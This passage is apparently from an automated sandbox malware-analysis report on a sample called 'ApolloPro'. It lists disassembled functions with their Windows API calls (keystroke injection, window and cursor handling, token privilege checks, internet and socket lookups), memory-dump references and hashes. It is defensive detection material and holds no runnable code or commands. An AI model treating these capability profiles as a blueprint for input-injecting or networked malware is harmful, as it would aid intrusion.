                                                                                              • Instruction Fuzzy Hash: 68315A30A40619EEFF308A658C05BFD7BBFAB46320F24431AE4915AFD1D3748D419B95
                                                                                              Function 00691410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00691465
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00691481
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 006914E0
                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00691532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: bbad50198ae170b269af48c684088b629e281656ea1c5383c2e99d3e8d7e8ec6
                                                                                              • Instruction ID: a8427c7fc319d83df8edab50b59dbf6b4e8d9d8f057d2e7d4dca1a73098e249f
                                                                                              • Opcode Fuzzy Hash: bbad50198ae170b269af48c684088b629e281656ea1c5383c2e99d3e8d7e8ec6
                                                                                              • Instruction Fuzzy Hash: CF31827094020A9EFF34CB659C04BFE77EFAB8A710F24431BE0815AAD1C3348D428B61
                                                                                              Function 006663F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0066642B
                                                                                              • __isleadbyte_l.LIBCMT ref: 00666459
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00666487
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006664BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: cd1535c4e2475b66ce3a8157a94a545801ac7b70c384cd5267df8c02bb81e5b3
                                                                                              • Instruction ID: 7f6386d50c3277c35535fb40f0cc5580c37e7c275f09ebf988e562c9ea3eef65
                                                                                              • Opcode Fuzzy Hash: cd1535c4e2475b66ce3a8157a94a545801ac7b70c384cd5267df8c02bb81e5b3
                                                                                              • Instruction Fuzzy Hash: 0831B031604256AFDB218F75EC44BBA7BEAFF40360F158169F86487291DF31E851DB50
                                                                                              Function 006B552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 006B553F
                                                                                                • Part of subcall function 00693B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00693B4E
                                                                                                • Part of subcall function 00693B34: GetCurrentThreadId.KERNEL32 ref: 00693B55
                                                                                                • Part of subcall function 00693B34: AttachThreadInput.USER32(00000000,?,006955C0), ref: 00693B5C
                                                                                              • GetCaretPos.USER32(?), ref: 006B5550
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 006B558B
                                                                                              • GetForegroundWindow.USER32 ref: 006B5591
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 5a43aa435242e2dcb37c2429101dcadab815cb5942061de435fe3ad73cb7cf05
                                                                                              • Instruction ID: e36d965d50b56fe8a963599bd7ec5c21303bdef32ad8a3ce547267a74febe7a6
                                                                                              • Opcode Fuzzy Hash: 5a43aa435242e2dcb37c2429101dcadab815cb5942061de435fe3ad73cb7cf05
                                                                                              • Instruction Fuzzy Hash: 23312A72D00108AFDB40EFA5D885DEFF7FAEF98304F10406AE415E7201EA71AE418BA4
                                                                                              Function 006BCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • GetCursorPos.USER32(?), ref: 006BCB7A
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0066BCEC,?,?,?,?,?), ref: 006BCB8F
                                                                                              • GetCursorPos.USER32(?), ref: 006BCBDC
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0066BCEC,?,?,?), ref: 006BCC16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: f1a3dfbb78a1f2a439e443f26087b04c51de4ce47603ca04247f082a2d49897f
                                                                                              • Instruction ID: bdc8b5bb30d573994d332bababe02ba569d0cd81ce9e49263eea98b5669880d3
                                                                                              • Opcode Fuzzy Hash: f1a3dfbb78a1f2a439e443f26087b04c51de4ce47603ca04247f082a2d49897f
                                                                                              • Instruction Fuzzy Hash: CD318D79600018AFCB158F59C859EFE7BB6EB49320F4440A9F9059B361C731AE91EFA0
                                                                                              Function 00650BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __setmode.LIBCMT ref: 00650BE2
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00697E51,?,?,00000000), ref: 00644041
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00697E51,?,?,00000000,?,?), ref: 00644065
                                                                                              • _fprintf.LIBCMT ref: 00650C19
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 0068694C
                                                                                                • Part of subcall function 00654CCA: _flsall.LIBCMT ref: 00654CE3
                                                                                              • __setmode.LIBCMT ref: 00650C4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 521402451-0
                                                                                              • Opcode ID: 5b16b380f327362442b783dd1162abfa8b4a2213e1c8497893398a69cb61b88e
                                                                                              • Instruction ID: 9a77e887d8b24e2ebcf12a792f752cf9d79f601c51049400ae48c5344550575f
                                                                                              • Opcode Fuzzy Hash: 5b16b380f327362442b783dd1162abfa8b4a2213e1c8497893398a69cb61b88e
                                                                                              • Instruction Fuzzy Hash: 22110531904104AADB48B7A4AC43AFE776F9F46322F14019EF904572C2DF31599A97A9
                                                                                              Function 00689274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00688D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00688D3F
                                                                                                • Part of subcall function 00688D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00688D49
                                                                                                • Part of subcall function 00688D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D58
                                                                                                • Part of subcall function 00688D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D5F
                                                                                                • Part of subcall function 00688D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00688D75
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006892C1
                                                                                              • _memcmp.LIBCMT ref: 006892E4
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0068931A
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00689321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 6f4efeba2f55440d8bb940cbc62c6f4f16ce22aace4b536f7ff1aedd981dc8c3
                                                                                              • Instruction ID: ad49cadd6661267a987c9d39824212f2af2075b1cf766e5ed658224a9fabae42
                                                                                              • Opcode Fuzzy Hash: 6f4efeba2f55440d8bb940cbc62c6f4f16ce22aace4b536f7ff1aedd981dc8c3
                                                                                              • Instruction Fuzzy Hash: A8219D31E40108EFDB10EFA4C945BFEB7BAEF45301F084199E844AB290D770AA04CBA0
                                                                                              Function 006A1E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006A1E6F
                                                                                                • Part of subcall function 006A1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006A1F18
                                                                                                • Part of subcall function 006A1EF9: InternetCloseHandle.WININET(00000000), ref: 006A1FB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1463438336-0
                                                                                              • Opcode ID: a230c82e1727c6a1f708804955080616e97e13a6197b69436765c38e2ce27c08
                                                                                              • Instruction ID: 70c7157d6bee5b7d78bf4fab7390b1054e0cf7778207686829ae1aeb65ba853f
                                                                                              • Opcode Fuzzy Hash: a230c82e1727c6a1f708804955080616e97e13a6197b69436765c38e2ce27c08
                                                                                              • Instruction Fuzzy Hash: A221CF31200605BFEB15AF609C00FBBB7ABBF86700F10411AFE119A650DB71EC119FA4
                                                                                              Function 006B634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006B63BD
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B63D7
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006B63E5
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006B63F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: c887661d6a7d6325e411bb2346689aa995a6f591b3ad7ba00ff4ead1c9bc278d
                                                                                              • Instruction ID: 2d7b139464a7cc037d03cffe590db7ebf377d239c5e01ec6248fef59244c1966
                                                                                              • Opcode Fuzzy Hash: c887661d6a7d6325e411bb2346689aa995a6f591b3ad7ba00ff4ead1c9bc278d
                                                                                              • Instruction Fuzzy Hash: AC110031300414AFE704AF24CC54FBA77AAEF85320F18521CF916CB2D2CBA5AC41CB98
                                                                                              Function 0068E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0068F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?), ref: 0068F867
                                                                                                • Part of subcall function 0068F858: lstrcpyW.KERNEL32(00000000,?,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068F88D
                                                                                                • Part of subcall function 0068F858: lstrcmpiW.KERNEL32(00000000,?,0068E46F,?,?,?,0068F262,00000000,000000EF,00000119,?,?), ref: 0068F8BE
                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E488
                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E4AE
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0068F262,00000000,000000EF,00000119,?,?,00000000), ref: 0068E4E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: 643ff12a1e6f0a934296cd48ef15093a7c3107b9eaa879766632f8a2da974066
                                                                                              • Instruction ID: 3b75229582bdbf312d2c01d379c8f68ab3950fd80aa2f8b0ad2cc6bbe024d810
                                                                                              • Opcode Fuzzy Hash: 643ff12a1e6f0a934296cd48ef15093a7c3107b9eaa879766632f8a2da974066
                                                                                              • Instruction Fuzzy Hash: 5911D03A200345EFDB25AF64DC45DBA77BAFF45350B50412EF80ACB2A0EB729941C795
                                                                                              Function 00665312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00665331
                                                                                                • Part of subcall function 0065593C: __FF_MSGBANNER.LIBCMT ref: 00655953
                                                                                                • Part of subcall function 0065593C: __NMSG_WRITE.LIBCMT ref: 0065595A
                                                                                                • Part of subcall function 0065593C: RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 3370707d4e5948d56cd8840d344f33fd4c831bc55d60e733919764d6e172bd50
                                                                                              • Instruction ID: 9155d9102e66f0ec943fd55f1743ca9c70c9180e134ef77100bf670371ecc6d8
                                                                                              • Opcode Fuzzy Hash: 3370707d4e5948d56cd8840d344f33fd4c831bc55d60e733919764d6e172bd50
                                                                                              • Instruction Fuzzy Hash: 6D110432505F16AFCB602F70AC066AA37979F14BA1F100929FC0ABB390EE7089418784
                                                                                              Function 00694365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00694385
                                                                                              • _memset.LIBCMT ref: 006943A6
                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006943F8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00694401
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1157408455-0
                                                                                              • Opcode ID: e7315c7a16f909a5072d64da2866311ad057fc622a9149fbbe2fd022f852fdf0
                                                                                              • Instruction ID: 0f8e3117fc623a24174357ee8aba66d88483a7d63a256ef8a93eb5e9842b8d78
                                                                                              • Opcode Fuzzy Hash: e7315c7a16f909a5072d64da2866311ad057fc622a9149fbbe2fd022f852fdf0
                                                                                              • Instruction Fuzzy Hash: 0A110D75901328BAE7309BA5AC4DFFBBB7CEF44760F00459AF908D7280D6744E808BA4
                                                                                              Function 006A6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00697E51,?,?,00000000), ref: 00644041
                                                                                                • Part of subcall function 0064402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00697E51,?,?,00000000,?,?), ref: 00644065
                                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 006A6A84
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6A8F
                                                                                              • _memmove.LIBCMT ref: 006A6ABC
                                                                                              • inet_ntoa.WSOCK32(?), ref: 006A6AC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 1504782959-0
                                                                                              • Opcode ID: 0799bf49e2282c1a23e5c51349f3aaa71bf7113290849c98dfba5d9f54a52c2f
                                                                                              • Instruction ID: f3e46dfe9a1623d7b3b9459ba50108f333c8728ccd2b6766d3cd8f6cf70030ea
                                                                                              • Opcode Fuzzy Hash: 0799bf49e2282c1a23e5c51349f3aaa71bf7113290849c98dfba5d9f54a52c2f
                                                                                              • Instruction Fuzzy Hash: 52115171900108EFCB44FBA4CD86DEEB7BAEF05310B144169F502A72A2DF31AE14DBA5
                                                                                              Function 0063166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 006316B4
                                                                                              • GetClientRect.USER32(?,?), ref: 0066B93C
                                                                                              • GetCursorPos.USER32(?), ref: 0066B946
                                                                                              • ScreenToClient.USER32(?,?), ref: 0066B951
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: 524dfea0b7cc5e95f077bbc30a034f416d5c5e245a4432ae34752b80a2dd181d
                                                                                              • Instruction ID: 76bed02fcf6af65bd1c933d56909c2e9a5e6cc4c06c75581f6b0807ed7964408
                                                                                              • Opcode Fuzzy Hash: 524dfea0b7cc5e95f077bbc30a034f416d5c5e245a4432ae34752b80a2dd181d
                                                                                              • Instruction Fuzzy Hash: 16112575A00119EBDB00EF98C896DFE7BBAFB0A300F54045AF951EB250C730BA51CBA5
                                                                                              Function 006896F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00689719
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0068972B
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00689741
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0068975C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
